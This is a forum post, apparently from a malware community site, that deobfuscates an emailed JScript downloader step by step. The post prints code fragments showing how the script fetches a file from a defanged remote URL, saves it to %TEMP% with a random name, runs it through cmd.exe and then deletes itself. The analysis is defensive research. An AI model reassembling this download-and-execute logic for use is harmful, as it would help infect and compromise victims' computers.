FileObjectSystem.deleteFile("J:\\ANALISE\\21_11_2016\\EMAIL_25793.js")
2-3) The payload path/name :

In the previous sample, there was an error :

welerle0 = ymnevi2[ezlajvelevny5 + ysuzsibi2 + uhvaj9 + tutobmytvo0 + hivelg1](epygejm8 + pkekzigl8);
=>Stream.SaveToFile(%TEMP% + rad44325.tmp)
=> they have forgotten the "\\" part beeten %TEMP and rad44325.tmp
=> It should has been : C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp :rolleyes:

=> It is : C:\Users\DardiM\AppData\Local\Temprad44325.tmp :D

In these new samples, they have corrected it :

var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();

Using the search tool from notepad++, to find what mean the "strange name" of vars​

var czeqip = FileObjectSystem["Get" + "Spe" + "cia" + "lFo" + "lde" + "r"](2) + "\\\\"
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]

=> var czeqip = FileObjectSystem["GetSpecialFolder"](2) + "\\\\"
+ FileObjectSystem["GetTempName"]

GetSpecialFolder"](2)
=> %TEMP%
=> Example : C:\Users\DardiM\AppData\Local\Temp\
GetTempName :
=> get a random .tmp file name
=> Example : rad44325.tmp

=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp

(with the error : C:\Users\DardiM\AppData\Local\Temprad44325.tmp)


This time, good folder and good random payload name used, they have not forgotten "\\\\" :

%TEMP% + "\\\\" + Randomname.tmp

why four "\" ?!
The backslash is used as a marker character to tell the compiler/interpreter that the next character has some special meaning
\ is used as an information, so the first \ allows to tell to the interpreter that the second \ is a char
"\\" => mean : use "\"
then "\\\\" => mean use "\\"
at the concatenation "\\\\" => "\\"
And at the use of the whole string :
C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
2-4) The case part :

case true:
var hvaqxena = new Function(ileslyxy5)();
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}


Only one part is useful :

var hvaqxena = new Function(ileslyxy5)();

The other parts are the famous useless arrays stuff (see previous part 2-1) ) only put to obfuscate a bit more the script
(remember we have seen var hvaqxena : "return ActiveXObject;");

3) Main part - deobuscated :

var owdeqg2 = yvyndax;

=> "ADODB.Stream"
var ekwidedul = new hvaqxena(owdeqg2);

=> var ekwidedul = new ActiveXObject("ADODB.Stream");
=> create the Stream object that will be used to save the data received by the request

ekwidedul[urtiwguqja + hgudipcu]();

=> Stream["Open"]
=> Open the Stream : to be able to use it

var qupqykmy = ijigsokhimw3;

=> URL used : "http ://www .contrivedzh.top/admin.php?f=2.dat"
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;

=> Stream["Position"] = 0
=> prepare the position where to write the data

var gmavabava8 = derfycgy;

=> "WScript.Shell"
=> will be used to create an ActiveX object Shell

var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];

=> var ecystogo = WScript["ScriptFullName"]
=> The script full name
=> Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"

var exet3 = new hvaqxena(gmavabava8);

=> var exet3 = new ActiveXObject( "WScript.Shell")
=> Shell object, will be use to run the payload (see above parts)

var qrujcydvipd9 = axduxynat;

=> "MSXML2.XMLHTTP"
=> the string that will be used to create the HTTP object

var gvidummulj7 = epcemescip;

=> "Scripting.FileSystemObject"

=> var gvidummulj7 = epcemescip;

=> var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];

=> texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4

=> "Scripting.FileSystemObject"
var jrasujw = new hvaqxena(gvidummulj7);

=> new ActiveXObject( "Scripting.FileSystemObject")
=> the object used to manipulate files / folders

var abogikn = new hvaqxena(qrujcydvipd9);

=> new ActiveXObject( "MSXML2.XMLHTTP")
=> create the http object, to make the request

var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();

=> Path :
=> Example : => C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp


var czeqip = FileObjectSystem["Get" + "Spe" + "cia" + "lFo" + "lde" + "r"](2) + "\\\\"
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]

=> var czeqip = FileObjectSystem["GetSpecialFolder"](2) + "\\\\"
+ FileObjectSystem["GetTempName"]

GetSpecialFolder"](2)

=> %TEMP%

=> Example : C:\Users\DardiM\AppData\Local\Temp\

GetTempName :

=> Example : rad44325.tmp

=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);

=> var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
=> "open"
=> Stream[open"]("GET", URL,0)
=> Open a connection on the URL

abogikn[pdimuly]();

=> var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
=> "send"
=> http["send"]()
=> http.send()
=> Make the http request

ekwidedul[osabaq + zudxoba8] = 1;

=> Stream.Type = 1
=> The data received will be consider as binary data (not text) when put on the Stream

if (abogikn[qusuhyxi + ynabovx4] == 200) {

=> http.Status == 200 ?
=> test if the request was successfully made


ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);

=> Stream["Write"](http["ResponseBody"])
=> Stream.Write(http.ResponseBody)
=> Writes the data received by the request, on the Stream object.

ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);

=> Stream["SaveTofile"](path)
=> Stream.SaveTofile(path)
=> save the data to a file, using the path
=> Example :

=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
ekwidedul[awgykpomoj1 + hdocirzy1]();

=> Stream["close"]()
=> Stream.close()
=> close the Stream object

var yhamgyv1 = odynfinteds + czeqip;

=> "cmd.exe /c " + path
=> Example : "cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp"
exet3[vwafgehni0](yhamgyv1, 0);

=> Shell["run"](commandLine ,0)
}
jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);


=> I have explained on part 2-3) how to deobfuscate this part
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)
=> delete the current running script

4) Conclusion :


Some parts has been improved in these new versions.

3 Types of array used, with one of them completely useless for the malware part (data not used as "puzzle parts", but to obfuscate a bit more the script).
Now, the useful value is not the last value, but need the index clue to be found

The error with folder / name to be used has been solved.

The script is deleting itself a the end.

URL :

http ://www .contrivedzh.top/admin.php?f=2.dat
Payload :

Example : C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp

Random name :

=> rad : means "random"
=> + 5 HEX values (0 => 9 and A => F)
3 / 56
Antivirus scan for 413830976864196c4ed5312af9888cf15a541ec0626e6101e2e2bb75276d187a at 2016-11-21 15:56:32 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...ec0626e6101e2e2bb75276d187a?environmentId=100
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top